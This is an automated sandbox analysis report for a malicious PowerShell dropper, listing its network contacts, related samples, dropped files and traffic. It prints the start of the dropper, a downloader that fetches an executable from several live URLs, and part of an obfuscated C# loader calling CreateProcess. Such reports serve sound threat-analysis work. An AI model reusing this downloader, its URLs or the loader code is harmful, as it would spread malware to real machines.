                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    198.185.159.145
                                                    bemnyc.comUnited States
                                                    53831SQUARESPACEUSfalse
                                                    162.43.104.133
                                                    eastend.jpUnited States
                                                    11333CYBERTRAILSUSfalse
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1560749
                                                    Start date and time:2024-11-22 09:21:33 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 6m 35s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:7
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:ps1008.ps1
                                                    Detection:MAL
                                                    Classification:mal96.expl.evad.winPS1@7/14@6/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 8
                                                    • Number of non-executed functions: 1
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .ps1
                                                    • Override analysis time to 240s for powershell
                                                    • Stop behavior analysis, all processes terminated
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                    • VT rate limit hit for: ps1008.ps1
                                                    TimeTypeDescription
                                                    03:22:27API Interceptor967303x Sleep call for process: powershell.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    198.185.159.145ps1006.ps1Get hashmaliciousUnknownBrowse
                                                    • bemnyc.com/u8erijeq
                                                    ps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • bemnyc.com/u8erijeq
                                                    Purchase Order #5315262WNH72901-The Sanford Company.pdfGet hashmaliciousUnknownBrowse
                                                    • aircormech.com/
                                                    firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.145/
                                                    firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.145/
                                                    eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                    • uwemusic.com/
                                                    FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
                                                    • familycompany.net/index.php
                                                    FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
                                                    • familycompany.net/index.php
                                                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                                    • www.wvpbuildingservices.com/bi09/?TJ=j0G4c8K0K&Czrt=lZMivCAdWjEad0YwZ6gLnX1BXgPIjGJJhnqogY0KbyoDqo2C47LZ+Q1xf2o08ygL02QL6A==
                                                    BWV4hz5GdR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                    • resolvedcx.com/PhpMyAdmin/
                                                    162.43.104.133ps1006.ps1Get hashmaliciousUnknownBrowse
                                                    • eastend.jp/bl5kfa
                                                    ps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • eastend.jp/bl5kfa
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    eastend.jpps1006.ps1Get hashmaliciousUnknownBrowse
                                                    • 162.43.104.133
                                                    ps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • 162.43.104.133
                                                    bemnyc.comps1006.ps1Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145
                                                    ps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145
                                                    pdf.ps1Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CYBERTRAILSUSps1006.ps1Get hashmaliciousUnknownBrowse
                                                    • 162.43.104.133
                                                    ps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • 162.43.104.133
                                                    IWnUKXop2x.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 162.43.182.68
                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                    • 162.43.62.102
                                                    25XrVZw56S.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    oUc5lyEzJy.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    JUHGSyleu7.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    oUc5lyEzJy.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    JUHGSyleu7.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    4wwi2Lh5W4.exeGet hashmaliciousUnknownBrowse
                                                    • 162.43.112.11
                                                    SQUARESPACEUSps1006.ps1Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145
                                                    ps1005.ps1Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145
                                                    https://link.edgepilot.com/s/62feea16/mgkISLmjmE63UVzPYgooJQ?u=https://ameely.com.eg/Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.145
                                                    https://sawfish-groundhog-d6h6.squarespace.com/Get hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    original.emlGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.144
                                                    https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    http://heptagon-olive-l8hr.squarespace.comGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 142.202.19.72
                                                    https://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                    • 198.185.159.177
                                                    No context
                                                    No context
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):61147
                                                    Entropy (8bit):5.077943793919534
                                                    Encrypted:false
                                                    SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                    MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                    SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                    SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                    SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1628158735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                    MD5:3A925CB766CE4286E251C26E90B55CE8
                                                    SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                    SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                    SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:@...e................................................@..........
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Nov 22 09:30:10 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1336
                                                    Entropy (8bit):3.983984692728225
                                                    Encrypted:false
                                                    SSDEEP:24:Hmm9pkHeaybHVwKqxmNII+ycuZhNKEakSLJPNnqSSd:5kHea0WKqxmu1ulja3vqSC
                                                    MD5:E52190C56EB46024E55B78D69972DB7F
                                                    SHA1:3FF0D7167F6E3D304EF159DC86F7C40AD8BEE57B
                                                    SHA-256:AC93DCCDDBC475D22849CBF8833ACE568137295ADF5BE3AF254ABDCE7658FC9E
                                                    SHA-512:8F21D99A58BB247AF6B4E76409E5680C7BE88D93C25F22796ED931963AAB8F700A92FC32DB7E34EF8CD142E31D2BC96AD3E740BE9E10CCBF5F990A9025EB03CF
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:L..."O@g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\xtxy3idj\CSCB2373C2DB48C49F0A0BD39442F2F8C98.TMP.................../u.^.kk....vU...........5.......C:\Users\user\AppData\Local\Temp\RES2CC0.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.t.x.y.3.i.d.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):652
                                                    Entropy (8bit):3.1080432186673335
                                                    Encrypted:false
                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywEak7YnqqLJPN5Dlq5J:+RI+ycuZhNKEakSLJPNnqX
                                                    MD5:DF2F75005E056B6BC3BF1599A676558C
                                                    SHA1:562B08018B18ABA68DBA68A449547E1891974682
                                                    SHA-256:98B9D21FF6E7917F132B34954E678C357330F2FD6C5B62D4B25CC267A3B43BAC
                                                    SHA-512:D643DC82A7255FA8E2F836DDBD75C51072DD2B07352A15563A8F814EE713219882C2B7DF9D79E8103D4C002FBEF6D3E0F43805E0414BEB614E0CA5C0B7ECEA89
                                                    Malicious:false
                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.t.x.y.3.i.d.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.t.x.y.3.i.d.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1032), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):1035
                                                    Entropy (8bit):4.369231230362479
                                                    Encrypted:false
                                                    SSDEEP:24:JVPHMxi73UnaDa+anvOq89NWEMF90A7Q/:JVPHMxi73fa++1UNWEpf
                                                    MD5:5989018A4C0AD9CC8BC4CC1E5524186C
                                                    SHA1:EC9217244192C5EC96B4AC67982AC05983036569
                                                    SHA-256:F2C563322C4D6A4C8B00946B48E3A59B45D8EC5991D977ACD4514960F8FAB4E5
                                                    SHA-512:2550FB415B2022E3E3D14BE551310C7C6821D8B1AF7854253D8701F5376D720E1F661C0177F24B0F3BFEDF90469064C107D72B1DCAC6EFA355C24DC6AA786975
                                                    Malicious:false
                                                    Preview:.using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct l1Ill1{public IntPtr llI1Il1111;public IntPtr ll11llII111;public uint II11IIIIIIl;public uint Il1lI1;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct l1lll1l{public uint II1l1Il1II;public string I11l1111I;public string lllIIlII;public string l1I1IIllI1I1;public uint I1I1ll11I;public uint lIlII11;public uint II11lIIl11I;public uint lIl1lIl1II11;public uint lIIl1Il;public uint Illl11I1;public uint II1ll1l11;public uint IlIlIl1Illl;public short l11111lI1l;public short lllIllI11I11;public IntPtr I1II1lIII;public IntPtr Il11lI1;public IntPtr ll1IlI;public IntPtr l1l11Il1lll1;};public static class lIlIlI{[DllImport("kernel32.dll",SetLastError=true)]public static extern bool CreateProcess(string llllIIIllIlI,string l1111I1I11I1,IntPtr ll1Il111,IntPtr IIIll11Il1,bool l1Il1lll111,uint IIlIl11l11l,IntPtr Il1I1Il11l1l,string l1l1Illl,ref l1lll
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):371
                                                    Entropy (8bit):5.24224997265569
                                                    Encrypted:false
                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923ftqNeF1J+zxs7+AEszI923ftqNeFEA:p37Lvkmb6KzkNeFD+WZE2kNeFP
                                                    MD5:942216A19F3482483ED1B5D4C235720A
                                                    SHA1:91DF3BA86EE1E8084E774FA68E5B0858F8630EA0
                                                    SHA-256:FE93CE00A416B1DCE7579663440482B14ADA338C023EDCA1295612E2F17776B0
                                                    SHA-512:399445072BBEB706BB640BD4AE8DBDA34D61CE446F8080183CD1644C5D42CDB4BBF315377A9F4687B8B21401FEDEEE05C4DBC39A2479FD17BC0298AFBCC8333D
                                                    Malicious:true
                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.0.cs"
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4096
                                                    Entropy (8bit):2.99068192331527
                                                    Encrypted:false
                                                    SSDEEP:48:6j+xOMHQ+7mlodYoDpw4IGjKsxg5D5P2oU7WhjJbiLtW1ulja3vq:bfQ+7mlyYoDpw47KCKooIcpcnxK
                                                    MD5:503E1913E4B4A8B3D22CA7D4F7677BAC
                                                    SHA1:4AEAE1605EE6F6D7B2E520A798B08DFFF2EB3E01
                                                    SHA-256:3166D93D761AD4634F8643E71AEA811C5C6D910D43A9E800C22C018261D864B9
                                                    SHA-512:8E58DBAD0D6A5DBE576F348E2C136A4C4A171FCD2C0929F1482FEA10F868578C436B375794D9CCC0004D4ED1B974617DBCB829663D8457E7FC642B4778CCBCF0
                                                    Malicious:false
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."O@g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..\...........................................................BSJB............v4.0.30319......l.......#~..T.......#Strings............#US.........#GUID.......d...#Blob...........W.........%3................................................................=.6...G.6...............".....I....._.....j.................................................&...........N.....Y.....e.....q.....x.......................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):872
                                                    Entropy (8bit):5.328787848355867
                                                    Encrypted:false
                                                    SSDEEP:24:KMoId3ka6KzkNeFD/E2kNeF2Kax5DqBVKVrdFAMBJTH:dokka6akkFD/E2kkF2K2DcVKdBJj
                                                    MD5:17F59E78E05A005ED1FA1B093740D60D
                                                    SHA1:260D6094A0210F8CD3FD1BB808ABFEF1650F856E
                                                    SHA-256:E25209C3363F332AEA25400E0BB3F9A26E63DC2BD8908804108B8B6E18C98B13
                                                    SHA-512:034E3BDA3DA7D2E5DCE9D4FCB2B1DBFF06CA14F9BC5EC6BAB90CA75429B0D04F80EDE5B01D2D56BFC39E7509F6275B06D654B6CBE5E9F0A46CFEABD48C753CE5
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.708632031427633
                                                    Encrypted:false
                                                    SSDEEP:48:wmuHG0CObU2K+pfukvhkvklCywMn28WwiyalzVSogZoXcWwiyal4JVSogZo71:tum0CroIkvhkvCCtUWfyaSHPWfya2yHg
                                                    MD5:4983D4A14FA6B7A92DCFB885D060EBB9
                                                    SHA1:E68DB936C11412567CDF6458A16F6DAB1812C97B
                                                    SHA-256:0B932FD4150DA71C80FA1C4CE1EF03752F66DB977F24F45E3C526F566156D2EC
                                                    SHA-512:10DC5C018FB3C82892C73C51C668C280A455E3BF430E71D784F04650B1EDA1245BAF0F9F5543C290562800E88EC2E0680BD173A446F472063F56C38DBD716193
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d......6...<..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........<..b...<......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlvY.B....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....vY.B..Roaming.@......DWSlvY.B....C.....................K...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlvY.B....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlvY.B....E......................9".W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlvY.B....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlvY.B....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlvY.B....q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.708632031427633
                                                    Encrypted:false
                                                    SSDEEP:48:wmuHG0CObU2K+pfukvhkvklCywMn28WwiyalzVSogZoXcWwiyal4JVSogZo71:tum0CroIkvhkvCCtUWfyaSHPWfya2yHg
                                                    MD5:4983D4A14FA6B7A92DCFB885D060EBB9
                                                    SHA1:E68DB936C11412567CDF6458A16F6DAB1812C97B
                                                    SHA-256:0B932FD4150DA71C80FA1C4CE1EF03752F66DB977F24F45E3C526F566156D2EC
                                                    SHA-512:10DC5C018FB3C82892C73C51C668C280A455E3BF430E71D784F04650B1EDA1245BAF0F9F5543C290562800E88EC2E0680BD173A446F472063F56C38DBD716193
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d......6...<..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........<..b...<......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlvY.B....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....vY.B..Roaming.@......DWSlvY.B....C.....................K...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlvY.B....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlvY.B....E......................9".W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlvY.B....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlvY.B....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlvY.B....q...........
                                                    File type:ASCII text, with very long lines (64682), with CRLF, LF line terminators
                                                    Entropy (8bit):5.709582305451932
                                                    TrID:
                                                      File name:ps1008.ps1
                                                      File size:869'112 bytes
                                                      MD5:54e842d329c2946cc0cf528af06f1a86
                                                      SHA1:4d0478ebcbcbb2f50964e64d3f1c748902434f93
                                                      SHA256:d006ed068aa21cbe7e34f6a2431da12e069529a53908cb965c0798c9fd9a98de
                                                      SHA512:7922586903b6a26d026c49d71c2e113928d8a9393ec100d7d232d8cec171f5c97cdc4303e75eec38b4c6005e765adeb18c7f9b3d58153c47e5a3cf7a7abd534f
                                                      SSDEEP:12288:8i6UD4ZwdWZ097bfm46LAC3pbFsh86rbckFv1ljUdNWqE63ZVHNta2vjpZx1MF5m:jMe7bPMS5bcGvjjsNY6LHLjpdo9rY31
                                                      TLSH:F6052355CD3F6B3E4B7893AD603A0E4E92F00F4044A4F3D4A5D57C9FA88AE16678352E
                                                      File Content Preview:$qzi=new-object net.webclient;$mrs='http://habarimoto24.com/nh@http://fenett2018.com/dobgx@http://eastend.jp/bl5kfa@http://bemnyc.com/u8erijeq@http://abakus-biuro.net//a9zqemm'.split('@');$wai = '509';$kqz=$env:public+'\'+$wai+'.exe';foreach($cme in $mrs)
                                                      Icon Hash:3270d6baae77db44
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 22, 2024 09:22:29.204390049 CET4970480192.168.2.5162.43.104.133
                                                      Nov 22, 2024 09:22:29.324421883 CET8049704162.43.104.133192.168.2.5
                                                      Nov 22, 2024 09:22:29.325681925 CET4970480192.168.2.5162.43.104.133
                                                      Nov 22, 2024 09:22:29.326545000 CET4970480192.168.2.5162.43.104.133
                                                      Nov 22, 2024 09:22:29.446218014 CET8049704162.43.104.133192.168.2.5
                                                      Nov 22, 2024 09:22:30.806360006 CET8049704162.43.104.133192.168.2.5
                                                      Nov 22, 2024 09:22:30.806425095 CET8049704162.43.104.133192.168.2.5
                                                      Nov 22, 2024 09:22:30.806466103 CET8049704162.43.104.133192.168.2.5
                                                      Nov 22, 2024 09:22:30.806505919 CET4970480192.168.2.5162.43.104.133
                                                      Nov 22, 2024 09:22:30.850651979 CET4970480192.168.2.5162.43.104.133
                                                      Nov 22, 2024 09:22:30.952908993 CET4970580192.168.2.5198.185.159.145
